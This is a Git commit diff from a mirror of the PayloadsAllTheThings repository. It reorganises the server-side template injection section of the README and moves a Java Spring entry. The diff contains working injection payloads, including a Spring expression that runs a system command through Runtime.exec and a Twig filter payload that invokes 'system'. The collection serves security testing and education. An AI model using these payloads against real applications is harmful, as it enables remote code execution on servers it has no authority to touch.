mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-24 05:15:26 +00:00
Update README.md
This commit is contained in:
parent
b672771a1b
commit
996c83bb4b
@ -72,7 +72,8 @@
|
|||||||
- [Twig - Template format](#twig---template-format)
|
- [Twig - Template format](#twig---template-format)
|
||||||
- [Twig - Arbitrary File Reading](#twig---arbitrary-file-reading)
|
- [Twig - Arbitrary File Reading](#twig---arbitrary-file-reading)
|
||||||
- [Twig - Code execution](#twig---code-execution)
|
- [Twig - Code execution](#twig---code-execution)
|
||||||
- [Java - Velocity](#velocity)
|
- [Java - Velocity](#java---velocity)
|
||||||
|
- [Java - Spring](#java---spring)
|
||||||
- [PHP - patTemplate](#pattemplate)
|
- [PHP - patTemplate](#pattemplate)
|
||||||
- [PHP - PHPlib](#phplib-and-html_template_phplib)
|
- [PHP - PHPlib](#phplib-and-html_template_phplib)
|
||||||
- [PHP - Plates](#plates)
|
- [PHP - Plates](#plates)
|
||||||
@ -879,15 +880,6 @@ Execute code using SSTI for Slim engine.
|
|||||||
|
|
||||||
---
|
---
|
||||||
|
|
||||||
## Spring Framework (Java)
|
|
||||||
|
|
||||||
```
|
|
||||||
*{7*7}
|
|
||||||
*{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec('id').getInputStream())}
|
|
||||||
```
|
|
||||||
|
|
||||||
---
|
|
||||||
|
|
||||||
## Twig
|
## Twig
|
||||||
|
|
||||||
[Official website](https://twig.symfony.com/)
|
[Official website](https://twig.symfony.com/)
|
||||||
@ -953,7 +945,7 @@ email="{{app.request.query.filter(0,0,1024,{'options':'system'})}}"@attacker.tld
|
|||||||
|
|
||||||
---
|
---
|
||||||
|
|
||||||
## Velocity
|
## Java - Velocity
|
||||||
|
|
||||||
[Official website](https://velocity.apache.org/engine/1.7/user-guide.html)
|
[Official website](https://velocity.apache.org/engine/1.7/user-guide.html)
|
||||||
> Velocity is a Java-based template engine. It permits web page designers to reference methods defined in Java code.
|
> Velocity is a Java-based template engine. It permits web page designers to reference methods defined in Java code.
|
||||||
@ -971,6 +963,16 @@ $str.valueOf($chr.toChars($out.read()))
|
|||||||
|
|
||||||
---
|
---
|
||||||
|
|
||||||
|
|
||||||
|
## Java - Spring
|
||||||
|
|
||||||
|
```python
|
||||||
|
*{7*7}
|
||||||
|
*{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec('id').getInputStream())}
|
||||||
|
```
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
## patTemplate
|
## patTemplate
|
||||||
|
|
||||||
> [patTemplate](https://github.com/wernerwa/pat-template) non-compiling PHP templating engine, that uses XML tags to divide a document into different parts
|
> [patTemplate](https://github.com/wernerwa/pat-template) non-compiling PHP templating engine, that uses XML tags to divide a document into different parts
|
||||||
|
Loading…
Reference in New Issue
Block a user